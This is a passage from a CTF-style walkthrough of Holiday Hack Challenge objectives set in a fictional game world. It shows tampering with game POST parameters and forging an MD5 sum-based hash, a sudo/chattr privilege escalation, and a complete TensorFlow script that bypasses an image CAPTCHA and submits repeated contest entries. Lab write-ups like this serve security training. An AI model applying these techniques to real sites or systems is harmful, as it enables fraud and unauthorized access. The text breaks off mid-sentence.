      dorm room and talk with Minty Candy Cane.
    </em>
  </div>

  <h3 id="obj07_1">I) Gain access to the Dormitories</h3>
  <div class="hangright">
    <img src="img/obj_07/frosty_lock.png" height="400px">
  </div>
  <div class="quote">
    <div class="name">Tangle Coalbox:</div>
    <div>
      Hey kid, it's me, Tangle Coalbox. <br>
      I'm sleuthing again, and I could use your help.
      Ya see, this here number lock's been popped by someone. <br>
      I think I know who, but it'd sure be great if you could open 
      this up for me. I've got a few clues for you.
      <ol>
        <li>One digit is repeated once.</li>
        <li>The code is a prime number.</li>
        <li>You can probably tell by looking at the keypad which buttons are used.</li>
      </ol>
    </div> 
  </div>
  <p>
    Looking at the keypad, one can see that the <b>1</b>, <b>3</b>, <b>7</b>
    and ENTER keys have thawed slightly from regular use. I imported 
    a tab separated list of primes up to 10.000 (<code>primes.txt</code>)
    and tried each 4 digit prime for being a valid code. It is 
    sufficient to check that all digits 1,3,7 are used at least once. 
  </p>
  <pre class="prettyprint lang-python">
with open("primes.txt", "r") as fh:
    primes = fh.read().split()

for p in primes:
    if len(p) == 4 and set(p) == {'1', '3', '7'}:
        print(p)</pre>
  <p>
    5 possibilities exist: 1373, 1733, 3137, 3371 and <mark>7331</mark>. 
    The last one (not surprisingly) opens the lock.
  </p>
  <div class="quote">
    <div class="name">Tangle Coalbox:</div>
    Yep, that's it. Thanks for the assist, gumshoe.
    Hey, if you think you can help with another problem, 
    Prof. Banas could use a hand too.
    Head west to the other side of the quad into 
    Hermey Hall and find him in the Laboratory.
  </div>

  <h3 id="obj07_2">II) Help Minty Candycane</h3>
  <div class="terminal">
    <img src="img/obj_07/holiday_hack_trail.png">
    <img src="img/obj_07/supplies.png">
    <img src="img/obj_07/trail_start.png">
  </div>
  <div class="quote">
    <div class="name">Minty Candycane:</div>
    Hi! I'm Minty Candycane!
    I just LOVE this old game!
    I found it on a 5 1/4" floppy in the attic.
    You should give it a go!
    If you get stuck at all, check out this year's talks.
    One is about web application penetration testing.
    Good luck, and don't get dysentery!
  </div>
  <div class="hint">
    &xrarr;
    <a href="https://youtu.be/0T6-DQtzCgM">Web App Pen Testing</a>
  </div>
  <p>
    So, Minty is worried about Shigella. Unusual in candy canes I would have thought. 
    And the Web App talk was very nice, quite digestible. But lets not digress.
  </p>
  <p>
    The game is actually a lot of fun! After selecting a difficulty on the starting
    screen, supplies can be purchased in a shop, and then we hit the trail, fight 
    disease and food shortage, go hunting and shopping, and hopefully reach KringleCon 
    before time runs out. Beating the game on Easy is, well, easy, but takes time and 
    patience. We want to beat the game on hard. So, lets cheat a bit ...
  </p>
  <p>
    The first step is to check the source-code of the frame showing the game. Leaving
    out all the CSS, we see an encoded playerid, a POST request to set difficulty and 
    some comments indicating that hash integrity validation has been added (not visible 
    yet). In order to mess around with the game, it is helpful to get rid of the 
    annoying framing. This is a bit tricky, because the  actual game URL
    <a href="https://trail.elfu.org">https://trail.elfu.org</a> sets the playerid 
    to Jebediah Springfield (founder of the city of Springfield, as in Simpsons) by 
    default. This has to be changed, so that the fake win to come gets associated with 
    the correct account. It is probably enough to copy the playerid from the game frame
    into the starting URI <code>trail.elfu.org/gameselect/?playerid=xxx</code>, but I 
    also included the trail-mix-cookie for good measure.
  </p>
  <pre class="prettyprint lang-html">
  &lt;div class="topnav"&gt;
    &lt;div class="centered"&gt;
      &lt;form id="urlform" action="/gameselect/" method="post" class="urlform"&gt;
        &lt;input type="text" class="urlbar" value="hhc://trail.hhc/gameselect/" name="url" size="40"&gt;
        &lt;input type="hidden" class="playerid" <mark>name="playerid" value="ea364429-63c5-423c-9e41-37c9375ca8be"</mark>&gt;
        &lt;input type="submit" class="urlbtn" name="submit" value="&gt;"/&gt;
      &lt;/form&gt;
    &lt;/div&gt;
    &lt;h1 class="tight"&gt;&lt;img src="art/pieces/hht.png" alt="header"&gt;&lt;/h1&gt;
    &lt;h1 class="tight"&gt;&lt;img src="art/pieces/header.png" alt="header"&gt;&lt;/h1&gt;
  &lt;/div&gt;
  &lt;div id="page-container"&gt;  
    &lt;p&gt;
      Welcome to the Trail!  It's nearly time for Kringlecon.  You need to get there 
      before the 25th day of December!  Hitch up your reindeer, gather your supplies, 
      and do your best to make it to the North Pole on time.&lt;br&gt; Good luck! 
    &lt;/p&gt;
    &lt;h2&gt;Select Difficulty&lt;/h2&gt;
    &lt;table id="info"&gt;&lt;form id="userform" action="/store/" <mark>method="post"</mark>&gt;
      &lt;input type="submit" class="btn" name="difficulty" value="Easy" /&gt;&nbsp;
      &lt;input type="submit" class="btn" name="difficulty" value="Medium" /&gt;&nbsp;
      &lt;input type="submit" class="btn" name="difficulty" value="Hard" /&gt;&nbsp;&lt;br&gt;
      &lt;input type="hidden" class="playerid" name="playerid" value="ea364429-63c5-423c-9e41-37c9375ca8be" /&gt;
    &lt;/form&gt;&lt;/table&gt;&lt;br&gt;&lt;br&gt;
    &lt;ul style='list-style-type: none; padding: 0px; text-align: left;'&gt;
      &lt;li&gt;&lt;b&gt;Easy:&lt;/b&gt; Start with 5000 money on 1 July&lt;/li&gt;&lt;br&gt;
          &lt;!-- possibly vulnerable to URL param manipulation --&gt;
      &lt;li&gt;&lt;b&gt;Medium:&lt;/b&gt; Start with 3000 money on 1 August&lt;/li&gt;&lt;br&gt;
          &lt;!-- params moved to body of POST request --&gt;
      &lt;li&gt;&lt;b&gt;Hard:&lt;/b&gt; Start with 1500 money on 1 September&lt;br&gt;&lt;br&gt;
          &lt;img src="art/pieces/header.png" alt="header"&gt;&lt;/li&gt;
          <mark>&lt;!-- add hash integrity to ensure there's NO cheating! --&gt;</mark>
    &lt;/ul&gt;
  &lt;/div&gt;
  </pre>
  <p>
    Lets be manly and select difficulty hard. Next comes the opportunity to 
    purchase supplies. As shown in the talk, one can try to buy more than permitted 
    by using negative values, e.g. for ammo, but unfortunately the server notices:
  </p>
  <img src="img/obj_07/bad_boy.PNG" class="centered" width="300px">
  <p>
    Unlucky, but illegally stocking up is pedestrian anyway. Much more interesting 
    is the hidden <b>status container</b> concealed within the source code, which appears
    in every game page from now on: 
  </p>
  <pre class="prettyprint lang-html">
  &lt;div id="statusContainer"&gt;
    &lt;input type="hidden" name="difficulty" class="difficulty" value="2"&gt;
    &lt;input type="hidden" <mark>name="money" class="difficulty" value="0"</mark>&gt;
    &lt;input type="hidden" <mark>name="distance" class="distance" value="61"</mark>&gt;
    &lt;input type="hidden" <mark>name="curmonth" class="difficulty" value="9"</mark>&gt;
    &lt;input type="hidden" <mark>name="curday" class="difficulty" value="2"</mark>&gt;
    &lt;input type="hidden" name="name0" class="name0" value="Chris"&gt;
    &lt;input type="hidden" name="health0" class="health0" value="100"&gt;
    &lt;input type="hidden" name="cond0" class="cond0" value="0"&gt;
    &lt;input type="hidden" name="cause0" class="cause0" value=""&gt;
    &lt;input type="hidden" name="deathday0" class="deathday0" value="0"&gt;
    &lt;input type="hidden" name="deathmonth0" class="deathmonth0" value="0"&gt;
    &lt;input type="hidden" name="name1" class="name1" value="Mathias"&gt;
    &lt;input type="hidden" name="health1" class="health1" value="100"&gt;
    &lt;input type="hidden" name="cond1" class="cond1" value="0"&gt;
    &lt;input type="hidden" name="cause1" class="cause1" value=""&gt;
    &lt;input type="hidden" name="deathday1" class="deathday1" value="0"&gt;
    &lt;input type="hidden" name="deathmonth1" class="deathmonth1" value="0"&gt;
    &lt;input type="hidden" name="name2" class="name2" value="Joseph"&gt;
    &lt;input type="hidden" name="health2" class="health2" value="100"&gt;
    &lt;input type="hidden" name="cond2" class="cond2" value="0"&gt;
    &lt;input type="hidden" name="cause2" class="cause2" value=""&gt;
    &lt;input type="hidden" name="deathday2" class="deathday2" value="0"&gt;
    &lt;input type="hidden" name="deathmonth2" class="deathmonth2" value="0"&gt;
    &lt;input type="hidden" name="name3" class="name3" value="Emmanuel"&gt;
    &lt;input type="hidden" name="health3" class="health3" value="100"&gt;
    &lt;input type="hidden" name="cond3" class="cond3" value="0"&gt;
    &lt;input type="hidden" name="cause3" class="cause3" value=""&gt;
    &lt;input type="hidden" name="deathday3" class="deathday3" value="0"&gt;
    &lt;input type="hidden" name="deathmonth3" class="deathmonth3" value="0"&gt;
    &lt;input type="hidden" <mark>name="reindeer" class="reindeer" value="5"</mark>&gt;
    &lt;input type="hidden" <mark>name="runners" class="runners" value="2"</mark>&gt;
    &lt;input type="hidden" <mark>name="ammo" class="ammo" value="10"</mark>&gt;
    &lt;input type="hidden" <mark>name="meds" class="meds" value="2"</mark>&gt;
    &lt;input type="hidden" <mark>name="food" class="food" value="92"</mark>&gt;
    &lt;input type="hidden" <mark>name="hash" class="hash" value="cedebb6e872f539bef8c3f919874e9d7"</mark>&gt;
  &lt;/div&gt;
  </pre>
  <p>
    The status above was pulled after the first move, with 3 extra reindeer. 
    By checking the browser dev tools, one can see that all these parameters are passed
    along as POST parameters with every request made. The server avoids having to keep 
    game state this way. An open invitation for meddling, if one can get around the hash 
    protection. The hash is simply MD5, which can be reversed using 
    <a href="https://hashkiller.co.uk/Cracker/MD5">rainbow tables</a>:
    <b>cedebb6e872f539bef8c3f919874e9d7 = MD5(183)</b>.  
    Some experimentation confirms that this is just the sum of the status field values of
    <ul>
      <li>money = 0</li>
      <li>distance = 61</li>
      <li>curmonth = 9</li>
      <li>curday = 2</li>
      <li>reindeer = 5</li>
      <li>runners = 2</li>
      <li>ammo = 10</li>
      <li>meds = 2</li>
      <li>food = 92</li>
    </ul>
  </p>
  <p>
    To exploit this, I intercepted the POST request for the next day with a 
    proxy (I used ZAP) and changed the payload by adding 7800 to the distance. 
    (adding more seemed to result in hash failure, for some reason)
  </p>
  <ul>
    <li>
      original POST payload:<br>
      pace=0&playerid=6ff3d3f5-dd30-4b0f-87ab-475eb3e7ac5e&action=go&difficulty=2&money=0&distance=61&curmonth=9&curday=2&name0=Chris&health0=100&cond0=0&cause0=&deathday0=0&deathmonth0=0&name1=Mathias&health1=100&cond1=0&cause1=&deathday1=0&deathmonth1=0&name2=Joseph&health2=100&cond2=0&cause2=&deathday2=0&deathmonth2=0&name3=Emmanuel&health3=100&cond3=0&cause3=&deathday3=0&deathmonth3=0&reindeer=5&runners=2&ammo=10&meds=2&food=92&hash=cedebb6e872f539bef8c3f919874e9d7
    </li>
    <li>
      modified POST payload:<br>
      pace=0&playerid=6ff3d3f5-dd30-4b0f-87ab-475eb3e7ac5e&action=go&difficulty=2&money=0&<mark>distance=7861</mark>&curmonth=9&curday=2&name0=Chris&health0=100&cond0=0&cause0=&deathday0=0&deathmonth0=0&name1=Mathias&health1=100&cond1=0&cause1=&deathday1=0&deathmonth1=0&name2=Joseph&health2=100&cond2=0&cause2=&deathday2=0&deathmonth2=0&name3=Emmanuel&health3=100&cond3=0&cause3=&deathday3=0&deathmonth3=0&reindeer=5&runners=2&ammo=10&meds=2&food=92&<mark>hash=6e4621af9a4da94a7c85d7ecd19b1271</mark>
    </li>
  </ul>
  <p>
    where 6e4621af9a4da94a7c85d7ecd19b1271 = MD5(7983). And luck smiled:
  </p>
  <img src="img/obj_07/leap_ahead.png" class="centered" width="500px">
  <p>
    What a leap ahead! A few days later, good Minty was overjoyed to see me beat the 
    game. Ho ho ho ...
  </p>
  <img src="img/obj_07/success.png" class="centered" width="500px">
  <p>
    Actually, there is an extra hidden in this success page which I missed at the 
    time, but which was pointed out by <a href="#obj11_1">Kent Tinseltooth</a> later 
    after solving his talkative braces issue. The source code contains a comment which 
    is a hint for <a href="#obj11_2">objective 11</a>!
  </p>
  <pre>
  &lt;!-- 1 - When I'm down, my F12 key consoles me
  2 - Reminds me of the transition to the paperless naughty/nice list...
  3 - Like a present stuck in the chimney!  It got sent...
  4 - We keep that next to the cookie jar
  5 - My title is toy maker the combination is 12345
  6 - Are we making hologram elf trading cards this year?
  7 - If we are, we should have a few fonts to choose from
  8 - The parents of spoiled kids go on the naughty list...
  9 - Some toys have to be forced active
  10 - Sometimes when I'm working, I slide my hat to the left and move odd things onto my scalp! --&gt;    
  </pre>

  <div class="quote">
    <div class="name">Minty Candycane:</div>
    You made it - congrats!
    Have you played with the key grinder in my room? Check it out!
    It turns out: if you have a good image of a key, you can physically copy it.
    Maybe you'll see someone hopping around with a key here on campus.
    Sometimes you can find it in the Network tab of the browser console.
    Deviant has a great talk on it at this year's Con.
    He even has a collection of key bitting templates for common vendors 
    like Kwikset, Schlage, and Yale.
  </div>
  <div class="hint">
    &xrarr;
    <a href="https://youtu.be/KU6FJnbkeLA">Optical Decoding of Keys</a>
  </div>
  <div class="hint">
    &xrarr;
    <a href="https://github.com/deviantollam/decoding">Deviant's Key Decoding Templates</a>
  </div>

  <h3 id="obj07_3">III) Get Access To The Steam Tunnels</h3>
  <img src="img/obj_07/dorm_room.png" class="centered" width="700px">
  <div class="hangright">
    <img src="img/obj_07/lock.png" width="200px">
    <img src="img/obj_07/lock_make.png" width="200px">
  </div>
  <p>
    The door of the dorm room on the far right is slightly ajar. Curiosity beats 
    politeness, so lets have a snoop. A student room with a strange character 
    inside, who looks surprised and quickly hops away into a walk-in closet. 
    Following him leads to a locked door with a pin-tumbler wall-lock.
  </p>
  <p>
    This is a physical security problem, or in less polite terms breaking 
    and entering. To beat the wall lock, I need a key, which I don't have.
    The excellent talk by <b>Deviant Ollam</b> on 
    <a href="https://youtu.be/KU6FJnbkeLA">optical decoding of keys</a>
    is an eye opener, and Minty Candycane's hint instructs how to put 
    theory into practice. 
  </p>
  <p>
    all we need is a photo of the original key, and the make of the lock.
    The lock is a Schlage, which can be read after some image magnification 
    and sharpening. But where to get an image of the key? The strange guy
    hopping into the closet seems to be wearing a key on his belt. Simply 
    taking a screenshot is not good enough, because the resolution is 
    far too low to be useful. If I had read Minty's hint carefully before 
    doing this, I would have looked for a high resolution image of the key 
    in the Network tab of the browser console. But of course I had to rush 
    ahead blindly, because this is fun ...
  </p>
  <div>
    <img src="img/obj_07/key_1.png" height="200px">
    <img src="img/obj_07/key.png" height="200px">
    <img src="img/obj_07/key_overlay.png" height="200px">
  </div>
  <p>
    I used a 500% zoom setting for the browser to improve the resolution,
    and applied the Schlage key decoding mask made available by Deviant. 
    It is difficult to read the bitting precisely because of the blurring,
    so I simply tried a few variants on the key grinder sitting on the desk
    and entered the closet with 5 keys dangling from my belt
  </p>
  <img src="img/obj_07/grinder.png" class=centered width="500px">
  <div class="hangright">
    <img src="img/obj_07/danger.png" width="150px">
  </div>
  <p>
    The key with bitting code <b>122520</b> opened the lock and freed 
    passage into the dank steam tunnels (looks more like sewers to me ...).
    Ominous warning signs painted in blood(?) adorn the way. Ominous 
    music wafts across, and the presence of unspeakable evil is felt. Hairs
    standing on end, I made my way to the end of the passage ... only to 
    find good old <b>Krampus Hollyfeld</b> standing at his workbench. Would have 
    been too early for a climax, wouldn't it?
  </p>
  <div class="quote">
    <div class="name">Krampus:</div>
    Hello there! I’m Krampus Hollyfeld.
    I maintain the steam tunnels underneath Elf U,
    Keeping all the elves warm and jolly.
    Though I spend my time in the tunnels and smoke,
    In this whole wide world, there's no happier bloke!
    Yes, I borrowed Santa’s turtle doves for just a bit.
    Someone left some scraps of paper near that fireplace, which is a big fire hazard.
    I sent the turtle doves to fetch the paper scraps.
    But, before I can tell you more, I need to know that I can trust you.
  </div>
  <p>
    Well, this solves the Turtle Dove mystery, and should ease Santa's mind. But there 
    seems to be a deeper issue here, and before finding out, Krampus' trust issues
    have to be resolved. After all, who can trust anyone in a neighbourhood as nefarious 
    as ELFU?
  </p>
  <div class="answer"><b>Answer</b>: Krampus Hollyfeld.</div>

  <h2 id="obj08">Objective 8: Bypassing the Frido Sleigh CAPTEHA</h2>
  <div class="objective">
    Difficulty:4<br>
    Help Krampus beat the <a href="https://fridosleigh.com">Frido Sleigh contest</a>. 
    <em>
      For hints on achieving this objective, please talk with Alabaster 
      Snowball in the Speaker Unpreparedness Room.
    </em>
  </div>
  <h3 id="obj08_1">I) Help Alabaster Snowball</h3>
  <div class="terminal">
    <img src="img/obj_08/alabaster.png">
    <img src="img/obj_08/nyaned.png">
  </div>
  <div class="quote">
    <div class="name">Alabaster Snowball:</div>
    Welcome to the Speaker UNpreparedness Room!<br>
    My name's Alabaster Snowball and I could use a hand.
    I'm trying to log into this terminal, but something's gone horribly wrong.
    Every time I try to log in, I get accosted with ... a hatted cat and a toaster pastry?
    I thought my shell was Bash, not flying feline.
    When I try to overwrite it with something else, I get permission errors.
    Have you heard any chatter about immutable files? And what is sudo -l telling me?
  </div>
  <div class="hint">
    &xrarr; 
    <div>
      On Linux, a user's shell is determined by the contents of /etc/passwd.
    </div>
  </div>
  <div class="hint">
    &xrarr; 
    <div>
      Chatter? sudo -l says I can run a command as root. What does it do?
    </div>
  </div>
  <p>
    Obviously, someone was having fun. The starting screen of the terminal contains
    the credentials of Alabaster Snowball (alabaster_snowball : Password2), as well 
    as a challenge to log in as Alabaster and get a Bash prompt. 
    As soon as I try to change user with
    <code>su alabaster_snowball</code>, a video of a speeding Santa-cat 
    appears instead of a shell, and no command entry is possible.  
  </p>
  <p>
    The first hint points at <code>/etc/passwd</code>. A backup file <code>/etc/passwd-</code>
    is also around, indicating that someone might have been naughty.
  </p>
  <pre>
$<span>cat /etc/passwd</span>
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    _apt:x:100:65534::/nonexistent:/usr/sbin/nologin
    elf:x:1000:1000::/home/elf:/bin/bash
    alabaster_snowball:x:1001:1001::/home/alabaster_snowball:<mark>/bin/nsh</mark>
$<span>cat /etc/passwd-</span>
    same, except alabasters entry is now <mark>/bin/bash</mark></pre>
  <p>
    Because I do not know the root password, I cannot revert <code>/etc/passwd</code> 
    back to its original form. Instead, one could try to replace <code>/bin/nsh</code>.
    I was quite surprised to see that nsh has completely open permissions, and even
    more surprised to find out that it is still not editable! The challenge description 
    mentions <a href="http://www.aboutlinux.info/2005/11/make-your-files-immutable-which-even.html">
    immutable files</a>, so lets check its attributes: 
  </p>
  <pre>
$<span>ls -l /bin/nsh</span>
    -rwxrwxrwx 1 root root 75680 Dec 11 17:40 /bin/nsh
$<span>lsattr /bin/nsh</span>
    ----<mark>i</mark>---------e---- /bin/nsh</pre>
  <p>
    The 'i' in the attribute list stands for <b>immutable</b>, meaning the file cannot 
    be changed in any way without first removing the immutable flag from it. This is 
    enforced independently of access permissions on a file or user privileges. Only the 
    super user or a process that has the CAP_LINUX_IMMUTABLE capability can set or 
    clear this attribute.
  </p>
  <p>
    To get any further, I need to escalate my privileges. The command <b>sudo -l</b>
    was mentioned in the hint. According to man pages, <em>If no command is specified, 
    the -l (list) option will list the allowed (and forbidden) commands for the 
    invoking user (or the user specified by the -U option) on the current host.</em> 
  </p>
  <pre>
$<span>sudo -l</span>
    Matching Defaults entries for elf on 829ad1bd47ef:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
    User elf may run the following commands on 829ad1bd47ef:
        <mark>(root) NOPASSWD: /usr/bin/chattr</mark></pre>
  <p>
    How strangely convenient: user elf has permission to run <b>chattr</b> as root 
    without password. And chattr (without e) lets a user set file attributes.
    Once the immutable attribute is gone, /bin/nsh can be overwritten with /bin/bash
    (yes, yes, very brutish, absolutely, but it works), and Alabaster is a happy elf.
  </p>
  <pre>
$<span>sudo chattr -i /bin/nsh</span>
$<span>lsattr /bin/nsh</span>
    ----<mark>-</mark>---------e---- /bin/nsh
$<span>cp /bin/bash /bin/nsh</span>
$<span>su alabaster_snowball</span>
    Password: Password2
    Loading, please wait......

    You did it! Congratulations!</pre>

  <div class="quote">
    <div class="name">Alabaster Snowball:</div>
    Who would do such a thing?? Well, it IS a good looking cat.
    Have you heard about the Frido Sleigh contest?
    There are some serious prizes up for grabs.
    The content is strictly for elves. Only elves can pass the CAPTEHA challenge required to enter.
    I heard there was a talk at KCII about using machine learning to defeat challenges like this.
    I don't think anything could ever beat an elf though!
  </div>
  <div class="hint">
    &xrarr;
    <a href="https://www.youtube.com/watch?v=jmVPLwjm_zs&feature=youtu.be">Machine Learning Use Cases for Cyber Security</a>
  </div>

  <h3 id="obj08_2">II) Bypassing the Frido Sleigh CAPTEHA</h3>
  <div class="terminal">
    <img src="img/obj_08/frido_sleigh.png" style="width: 400px;">
    <img src="img/obj_08/frido_sleigh_2.png" style="width: 400px;">
  </div>
  <p>
    Back to Krampus and his trust issues. Though, I suspect that it 
    more the presence of greed than the lack of trust which motivates him ...
  </p>
  <div class="quote">
    <div class="name">Krampus:</div>
    <div>
      Tell you what – if you can help me beat the 
      <a href="https://fridosleigh.com/">Frido Sleigh contest</a> (Objective 8), 
      then I'll know I can trust you. <br>
      The contest is here on my screen and at fridosleigh.com.
      No purchase necessary, enter as often as you want, so I am!
      They set up the rules, and lately, I have come to realize 
      that I have certain materialistic, cookie needs.
      Unfortunately, it's restricted to elves only, and I can't bypass the CAPTEHA.
      (That's Completely Automated Public Turing test to tell Elves and Humans Apart.)
      I've already cataloged <a href="https://downloads.elfu.org/capteha_images.tar.gz">12,000 images</a>  
      and decoded the <a href="https://downloads.elfu.org/capteha_api.py">API interface</a>.
      Can you help me bypass the CAPTEHA and submit lots of entries?
    </div>
  </div>
  <p>
    I do sympathise with Krampus. Life-time cookie supplies is just too big an 
    opportunity to pass by. The page just asks for name, age, email, 
    cookie preferences and a short essay on the reason for your cookie crave.
    However, before the submission is accepted, a CAPTEHA (Completely Automated 
    Public Turing test to tell Elves and Humans Apart) is used to block
    unwanted entries, in particular Krampus. We have Alabaster Snowball to 
    thank for that:
  </p>
  <div class="answer">
    reCAPTEHA is a service created by Alabaster Snowball for the North Pole 
    that helps protect websites from Humans and The Krampus. A “CAPTEHA” is 
    a Turing test to tell elves and humans apart. It is easy for an elf to 
    solve because elves are magical creatures that work on holiday related 
    objects year-round and can spot and click hundreds of holiday items per 
    second. However, non-elves (like humans) will find it nearly impossible 
    to visualize, correctly identify and click holiday items fast enough before 
    the time runs out. Adding reCAPTEHA to a North Pole site enables North 
    Pole site administrators to protect systems that only elves should be 
    able to access. You only need to solve the CAPTEHA challenge once per 
    session and not for each and every subsequent HTTP request. 
  </div>
  <img src="img/obj_08/capteha.png" class="centered" height="400px">
  <p>
    The victim has to select 3 out of 6 image types in a tableau of 10x10
    images, with a time limit of 5 seconds. The idea is to use machine learning 
    to do this. Krampus has prepared by collecting 1996 examples of each 
    image type to train the algorithm (the guy must be desparate!):
  </p>
  <ul>
    <li>Candy Canes</li>
    <li>Christmas Trees</li>
    <li>Ornaments</li>
    <li>Presents</li>
    <li>Santa Hats</li>
    <li>Stockings</li>
  </ul>
  <p>
    As indicated in the hint by Alabaster Snowball, there is a video 
    on how to use machine learning to defeat captchas, together with
    <a href="https://github.com/chrisjd20/img_rec_tf_ml_demo">python code</a> 
    for a demo using the TensorFlow engine. This demo is a godsent, 
    because writing tensorflow code from scratch is far from obvious. 
    It also includes a dataset for separating apples from bananas as an 
    example, which helped validate the installation.
  </p>
  <p>
    The code comes in two parts. <code>retrain.py</code> uses a selected
    image feature vector module to train an image classifier on a set of 
    classified images, which requires a subfolder of example images
    for each image class. This takes quite some time. In the end, two 
    output files are generated:
  </p>
  <ol>
    <li><code>/tmp/retrain_tmp/output_graph.pb</code> - Trained Machine Learning Model</li>
    <li><code>/tmp/retrain_tmp/output_labels.txt</code> - Labels for Images</li>
  </ol>
  <p>
    The second part, <code>predict_images_using_trained_model.py</code> 
    predicts a set of unknown images based on this trained model.
  </p>
  <p>
    As a first attempt, I used the retrain code with default settings
    to build a trained model based on Krampus' data:
    <code>python retrain.py --image_dir ../capteha_images/</code>
    Next, I adapted Krampus' python API interface script to run 
    this model on the CAPTEHA images:
  </p>
  <pre class="prettyprint lang-python">
#!/usr/bin/env python3
# Fridosleigh.com CAPTEHA API - Made by Krampus Hollyfeld
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
tf.logging.set_verbosity(tf.logging.ERROR)
import requests
import json
import sys
import numpy as np
import threading
import queue
import time
import base64

def load_labels(label_file):
    label = []
    proto_as_ascii_lines = tf.gfile.GFile(label_file).readlines()
    for l in proto_as_ascii_lines:
        label.append(l.rstrip())
    return label

def predict_image(q, sess, graph, image_bytes, img_uuid, labels, input_operation, output_operation):
    image = read_tensor_from_image_bytes(image_bytes, <mark>input_height=192</mark>, <mark>input_width=192</mark>) # adapt for mobilenet
    results = sess.run(output_operation.outputs[0], {
        input_operation.outputs[0]: image
    })
    results = np.squeeze(results)
    prediction = results.argsort()[-5:][::-1][0]
    q.put( {'img_uuid':img_uuid, 'prediction':labels[prediction].title(), 'percent':results[prediction]} )

def load_graph(model_file):
    graph = tf.Graph()
    graph_def = tf.GraphDef()
    with open(model_file, "rb") as f:
        graph_def.ParseFromString(f.read())
    with graph.as_default():
        tf.import_graph_def(graph_def)
    return graph

def read_tensor_from_image_bytes(imagebytes, input_height=299, input_width=299, input_mean=0, input_std=255):
    image_reader = tf.image.decode_png( imagebytes, channels=3, name="png_reader")
    float_caster = tf.cast(image_reader, tf.float32)
    dims_expander = tf.expand_dims(float_caster, 0)
    resized = tf.image.resize_bilinear(dims_expander, [input_height, input_width])
    normalized = tf.divide(tf.subtract(resized, [input_mean]), [input_std])
    sess = tf.compat.v1.Session()
    result = sess.run(normalized)
    return result

def main():
    yourREALemailAddress = "oh_no@dream.on"

    # Creating a session to handle cookies
    s = requests.Session()
    url = "https://fridosleigh.com/"

    # Loading the Trained Machine Learning Model created from running retrain.py on the training_images directory
    graph = load_graph('/tmp/retrain_tmp/output_graph.pb')
    labels = load_labels("/tmp/retrain_tmp/output_labels.txt")

    # Load up our session
    input_operation = graph.get_operation_by_name("import/Placeholder")
    output_operation = graph.get_operation_by_name("import/final_result")
    sess = tf.compat.v1.Session(graph=graph)

    # Can use queues and threading to speed up the processing
    q = queue.Queue()

    json_resp = json.loads(s.get("{}api/capteha/request".format(url)).text)
    b64_images = json_resp['images']                    # A list of dictionaries eaching containing the keys 'base64' and 'uuid'
    challenge_image_type = json_resp['select_type'].split(',')     # The Image types the CAPTEHA Challenge is looking for.
    challenge_image_types = [challenge_image_type[0].strip(), challenge_image_type[1].strip(), challenge_image_type[2].replace(' and ','').strip()] # cleaning and formatting

    start_time = time.perf_counter()
    # Going to iterate over each of our images.
    for image in b64_images:
        print('Processing Image {}'.format(image["uuid"]))
        # We don't want to process too many images at once. 10 threads max
        while len(threading.enumerate()) &gt; 10:
            time.sleep(0.0001)

        # predict_image function is expecting png image bytes so we read image as 'rb' to get a bytes object
        image_bytes = base64.b64decode(image["base64"])
        threading.Thread(target=predict_image, args=(q, sess, graph, image_bytes, image["uuid"], labels, input_operation, output_operation)).start()

    print('Waiting For Threads to Finish...')
    while q.qsize() &lt; len(b64_images):
        time.sleep(0.001)

    # getting a list of all threads returned results
    prediction_results = [q.get() for x in range(q.qsize())]

    # do something with our results... Like print them to the screen.
    matches = []
    for prediction in prediction_results:
        print('TensorFlow Predicted {img_uuid} is a {prediction} with {percent:.2%} Accuracy'.format(**prediction))
        if prediction["prediction"] in challenge_image_types:
            matches.append(prediction["img_uuid"])

    # This should be JUST a csv list image uuids ML predicted to match the challenge_image_type .
    final_answer = ','.join(matches)
    print("Desired image types:", challenge_image_types)
    print("Matches:", matches)
    print("Time taken:", time.perf_counter() - start_time)
    
    json_resp = json.loads(s.post("{}api/capteha/submit".format(url), data={'answer': final_answer}).text)
    if not json_resp['request']:
        # If it fails just run again. ML might get one wrong occasionally
        print('FAILED MACHINE LEARNING GUESS')
        print('--------------------\nOur ML Guess:\n--------------------\n{}'.format(final_answer))
        print('--------------------\nServer Response:\n--------------------\n{}'.format(json_resp['data']))
        sys.exit(1)

    print('CAPTEHA Solved!')
    # If we get to here, we are successful and can submit a bunch of entries till we win
    userinfo = {
        'name': 'Krampus Hollyfeld',
        'email': yourREALemailAddress,
        'age': 180,
        'about': "Cause they're so flippin yummy!",
        'favorites': 'thickmints'
    }
    # If we win the once-per minute drawing, it will tell us we were emailed. 
    # Should be no more than 200 times before we win. If more, somethings wrong.
    entry_response = ''
    entry_count = 1
    while yourREALemailAddress not in entry_response and entry_count &lt; 200:
        print('Submitting lots of entries until we win the contest! Entry #{}'.format(entry_count))
        entry_response = s.post("{}api/entry".format(url), data=userinfo).text
        entry_count += 1
    print(entry_response)

if __name__ == "__main__":
    main()</pre>
  <p>
    It was quite a relief when the script was up and running, but disappointment followed:
    prediction was correct, but too slow! It took 17-20 seconds to predict all 100 images,
    but elves can do it in 5! Victory over the threat of machine 'intelligence'? Not 
    quite. A comment in <code>retrain.py</code> helped understand the issue:
  </p>
  <div class="answer">
    By default this script will use the highly accurate, but comparatively large and
